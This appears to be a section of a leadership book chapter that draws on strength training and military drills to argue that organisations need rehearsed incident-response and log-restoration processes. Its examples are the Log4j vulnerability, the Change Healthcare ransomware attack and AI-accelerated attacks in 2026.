§8.1 · Decisions Are Made Under Load

Stress Tests the System

Stress doesn’t break the system. It exposes what was already weak.

We often talk about “testing under load” as a strength-building concept. In the gym, it’s simple. Your ability to move weight when you’re tired is the real signal of progress. But in product leadership, systems design, and incident response, stress testing is often overlooked until it’s too late.

The Log4j vulnerability in December 2021 made that brutally clear. A zero-day exploit in a widely used Java library allowed remote code execution with minimal effort. Suddenly, nearly every organization had the same urgent questions:

  • Are we exposed?
  • Where is Log4j deployed in our environment?
  • Do we have visibility into historical access or exploitation attempts?

This wasn’t just a code issue. It was a test of organizational readiness — technical, operational, and strategic. Teams that had practiced incident response, mapped their architecture, and built cross-functional trust could move with purpose. Others stumbled, not because they didn’t care, but because they’d never trained for the moment.

It was the backup problem, writ large. Many companies back up data religiously, but few test whether they can actually recover it. Even fewer know how long recovery will take, or what their RTO (Recovery Time Objective) or RPO (Recovery Point Objective) really are. The lesson was hard-earned: backups are only as valuable as your ability to restore fast.

Log4j forced a parallel reckoning. Malicious scanning began months before the public disclosure, but most organizations didn’t retain accessible data that far back. They had cold storage — frozen or tiered off for cost savings — but had never practiced bringing it back online quickly for investigation.

When the pressure hit, teams had to figure out, often in real time, how to thaw data, rehydrate logs, and search for infection markers across old records.

Some had tested this process before. They knew the commands, the timing, the quirks of their tooling. They’d trained like operators. Others hadn’t. Some couldn’t search more than 30 days back. Others found that recovering historical logs was so cumbersome it may as well not have existed. Those companies weren’t just missing data. They were missing a disaster recovery plan for threat analytics.

At Elastic, customers who had previously rehearsed these data flows — archiving, restoring, and hunting — were able to quickly triage and verify impact, drawing from months-old telemetry. They weren’t just ingesting logs. They were building institutional memory.

And this mirrors what elite military units do when they train decision-making under fatigue. In Navy SEAL training or Army Special Forces SERE programs, candidates are made to perform operational tasks after sleep deprivation, cold water exposure, and physical exhaustion.

Not to break them, but to reveal what’s already broken.

In those moments, you don’t rise to the level of the manual. You fall to the level of your defaults. And the only way to improve those defaults is to train them, deliberately, under controlled stress.

We have lived the same shape since. In February 2024, the Change Healthcare ransomware attack took down claims processing, prescription routing, and billing across most of U.S. healthcare. The vulnerability wasn’t novel. The organizational readiness was. Hospitals that had drilled their incident response could keep dispensing prescriptions on paper. Others lost weeks to manual workarounds because no one had practiced operating without the platform. Same lesson, different load. Stress finds the truth.

The 2026 Stress Test Is Machine-Speed

The Log4j-shaped stress test was bad. The 2026 version is worse, because the attackers are no longer human-speed.

The mean time from vulnerability disclosure to confirmed exploitation has fallen from 2.3 years in 2019 to under one day in 2026. Breakout times — the window between initial compromise and lateral movement — are measured in seconds. Phishing campaigns crafted by large language models hit click-through rates 4.5 times higher than human-written ones. Capabilities that once required nation-state expertise are now available to anyone with an API key.

If you are not using AI to battle AI, you will lose. Defensive AI is the new minimum entry fee just to stay level. We will go deeper on this in the chapter on AI.

Stress Finds the Truth

It’s no different in product and platform work. You might have a dashboard for monitoring, a workflow for restores, a playbook for incident response. But unless you’ve tested them when it matters, they’re just ideas. Stress finds the truth.

So whether you’re squatting on trembling legs after five working sets or trying to rehydrate petabytes of logs to confirm an intrusion:

The system only works if it works under pressure.

This isn’t a new idea. We introduced it in Chapter 2 with James Clear:

“You do not rise to the level of your goals. You fall to the level of your systems.”

Under the weight of stress and urgency, that line deepens.

Goals vanish in crisis. Roadmaps collapse under pressure. What remains is the infrastructure you’ve trained, tested, and trusted.

Whether that’s a disaster recovery pipeline, a muscle memory forged in fatigue, or a culture that knows how to move without waiting for permission, it’s your system that carries you.

Resilience isn’t reactive — it’s built. Deliberately. Daily. And under load.